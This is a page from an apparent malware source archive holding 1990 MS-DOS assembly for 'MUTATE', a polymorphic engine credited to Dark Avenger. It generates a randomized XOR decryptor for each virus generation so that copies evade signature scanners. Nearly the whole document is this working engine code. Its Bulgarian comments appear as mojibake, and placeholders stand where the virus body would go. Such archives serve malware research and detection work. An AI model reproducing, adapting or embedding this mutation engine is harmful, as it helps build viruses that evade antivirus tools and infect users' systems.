MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.mutate.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

188 lines
3.0 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

page ,132
name mutate
title MUTATE - A Self-mutating Module for Viruses
.radix 16
.model tiny
.code
; This source code is a copyrighted material
; (C) 1990 DARK AVENGER
org 100
timer equ 46C
start:
jmp prog
; „¥ª®¤¨°  ®±­®¢­ ²  · ±² ¨ ®¯°¥¤¥«¿ ­®¬¥°  ­  £¥­¥° ¶¨¿²  ¨  ¤°¥±  ­  v_entry.
; ‡  ¤  ­ ¯° ¢¨ ¯®±«¥¤­®²®, ¢§¨¬¥ ®¯¥° ­¤  ­  JMP-a, ª®©²® ²°¿¡¢  ¤  ±²®¨ ­ 
;  ¤°¥± 100, ².¥. ­ ¯° ¢¥­® ¥ ± ¬® §  .COM ´ ©«®¢¥.
v_entry:
xchg ax,bp
mov si,100
inc si
add si,[si]
mov di,si
xor dx,dx
mov cx,(top-encrypt)/2-1
push cx
calcgen:
xor dx,[si+encrypt-v_entry+2]
org $-1
inc si
inc si
dec cx
jns calcgen
pop ax
decrypt:
xor [di+encrypt-v_entry+2],dx
org $-1
inc di
inc di
dec ax
jns decrypt
encrypt:
xchg si,si ;’¥§¨ ¨­±²°³ª¶¨¨ ±  ­¥®¡µ®¤¨¬¨
xchg dx,dx
add si,encrypt-top+2
dec dx
; ’³ª ²°¿¡¢  ¤  ±¥ ±«®¦¨ ¨­¨¶¨ «¨§¨° ¹ ²  · ±² ­  ¢¨°³± . <20> ° ¬¥²°¨:
; DX = -­®¬¥° ­  £¥­¥° ¶¨¿² 
; SI =  ¤°¥± ­  ¥²¨ª¥²  v_entry.
; . . .
prog:
push ds
xor ax,ax
mov ds,ax
mov ax,ds:[timer]
pop ds
call mutate
mov ax,4C00
int 21
; ’ §¨ ¯®¤¯°®£° ¬  ±º§¤ ¢  ±«³· ©­  ¬³² ¶¨¿ ­  ¤¥ª®¤¨° ¹ ²  · ±². <20> ° ¬¥²°¨:
; AX = ±«³· ©­® ·¨±«® (¢§¥²® ®² 0:46C)
mutate:
cld
xor dx,dx
push cs
pop ds
mov cx,90
div cx
call getcode
mov ds:[15],al
call getcode
mov ds:[1E],al
xchg ax,dx
mov dl,6
div dl
mov si,offset muttbl
mov bx,offset xlatbl1
call buildblk
mov [si],al
inc si
mov bx,offset xlatbl2
call buildblk2
mov bx,offset xlatbl3
call buildblk2
mov bx,offset muttbl-1
mov si,offset xlatdat
mov cx,xlatbl1-xlatdat
nextgen:
lodsb
test al,al
jz cantchg
push ax
and al,111b
xlat
mov ah,0F8
xchg ax,dx
pop ax
push cx
mov cl,3
shr al,cl
jz skipxlat
xlat
shl al,cl
jz skipxlat
xlat
shl al,cl
or dl,al
mov dh,0c0
skipxlat:
pop cx
and [si-(xlatdat+1-v_entry)],dh
or [si-(xlatdat+1-v_entry)],dl
cantchg:
loop nextgen
ret
buildblk2:
mov al,ah
buildblk:
shr al,1
mov dl,al
push ax
adc al,1
cmp al,3
jb setblk
sub al,3
setblk:
or dl,al
xlat
mov [si],al
inc si
pop ax
xlat
mov [si],al
inc si
mov al,dl
xor al,3
xlat
ret
getcode:
shr dx,1
mov al,79
jnc got
or al,100b
got:
ret
xlatdat db 0,4,0,0,4,0,26,0
db 2c,0,9,2,0,0,2,0
db 0e,0,4,4,2,0,0,3
db 0,0f,0,5,5,3,0,0
db 0,4,0,1
xlatbl1 db 0,1,2
xlatbl2 db 3,6,7
xlatbl3 db 7,4,5
chksum dw 1A03 ;Š®­²°®«­  ±³¬  ­  ¢¨°³± .
; <>ˆŒ€<C592>ˆ…! ’ §¨ ª®­²°®«­  ±³¬  ²°¿¡¢  ¤  ±¥ ±¬¥²­¥ ­  °ºª . ’¿ ±¥ ±¬¿²  ª ²®
; ±¥ ¥XOR-­ ² ¢±¨·ª¨ 16-¡¨²®¢¨ ¤³¬¨ ¬¥¦¤³ encrypt ¨ top. <20>°®¿ ¨¬ ²°¿¡¢  ¤  ¡º¤¥
; ­¥·¥²­® ·¨±«®,   ®±¢¥­ ²®¢  ± ¬¨¿ ¥²¨ª¥² chksum ²°¿¡¢  ¤  ¡º¤¥ ­  £° ­¨¶  ­ 
; ¤³¬ . „¨°¥ª²¨¢¨²¥ errnz ¢ ª° ¿ ­  ´ ©«  ®±¨£³°¿¢ ² ²®¢ . Ž±¢¥­ ²®¢   ª® ¬¥¦¤³
; encrypt ¨ top ¨¬  ­¿ª ª¢¨ ¤ ­­¨ ¨«¨ ª®¤ ª®¨²® ±¥ ¯°®¬¥­¿², ²¿ ²°¿¡¢  ¤  ±¥
; ±¬¿²  ¯® ®¯¨± ­¨¿  «£®°¨²º¬ ¯°¨ ¢±¿ª® § ° §¿¢ ­¥ ­  ´ ©«.
; ’³ª ²°¿¡¢  ¤  ±¥ ±«®¦¨ ®±² ­ « ²  · ±² ®² ¢¨°³± 
; . . .
top:
.errnz (encrypt-v_entry) mod 2
.errnz (top-encrypt) mod 4-2
.errnz (top-v_entry) mod 2
.errnz (chksum-v_entry) mod 2
muttbl db 7 dup(?) ;<3B> ¡®²­  ®¡« ±² §  ¯®¤¯°®£° ¬ ²  mutate
end start